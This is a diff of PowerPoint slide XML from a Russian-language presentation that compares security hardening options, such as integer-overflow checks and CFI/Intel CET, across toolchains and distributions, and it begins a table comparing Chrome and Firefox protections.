+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2180500840"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Integer Overflow</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="120989246"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" sz="1400" dirty="0"/>
+                        <a:t>Отключение оптимизаций</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="655522365"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+              <a:tr h="360000">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>CFI (Intel CET)</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>N</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent2"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Y</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr">
+                    <a:solidFill>
+                      <a:schemeClr val="accent6"/>
+                    </a:solidFill>
+                  </a:tcPr>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3025595264"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
+            </a:tbl>
+          </a:graphicData>
+        </a:graphic>
+      </p:graphicFrame>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Slide Number Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB54BA1-1A2C-46CA-B92D-4456CBEF3D1B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>83</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="TextBox 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4404B10-FDA8-4927-842E-733AD9B67402}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="9583270" y="1981200"/>
+            <a:ext cx="2357718" cy="2585323"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Наблюдения</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В дистрибутивах приняты различные решения о безопасности</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>включено меньше защит чем в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2831178096"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide84.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA933E97-8F69-4423-AB25-ACEB2004EA82}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
             <a:off x="497541" y="-74146"/>
             <a:ext cx="10515600" cy="1325563"/>
           </a:xfrm>
@@ -27946,12 +31377,9 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Сравнение с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Rust</a:t>
-            </a:r>
+              <a:t>Браузеры</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -27970,7 +31398,1299 @@
           <p:nvPr>
             <p:extLst>
               <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
-                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345191194"/>
+                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1931322201"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvGraphicFramePr>
+        <p:xfrm>
+          <a:off x="1035423" y="995885"/>
+          <a:ext cx="8090827" cy="5615997"/>
+        </p:xfrm>
+        <a:graphic>
+          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
+            <a:tbl>
+              <a:tblPr firstRow="1" bandRow="1">
+                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
+              </a:tblPr>
+              <a:tblGrid>
+                <a:gridCol w="2725451">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4226136556"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="2778926">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1905133483"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+                <a:gridCol w="2586450">
+                  <a:extLst>
+                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
+                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4013930117"/>
+                    </a:ext>
+                  </a:extLst>
+                </a:gridCol>
+              </a:tblGrid>
+              <a:tr h="366702">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="ru-RU" sz="1400" dirty="0"/>
+                        <a:t>Защита</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Chrome</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
+                        <a:t>Firefox</a:t>
+                      </a:r>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr anchor="ctr"/>
+                </a:tc>
+                <a:extLst>
+                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
+                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2621139126"/>
+                  </a:ext>
+                </a:extLst>
+              </a:tr>
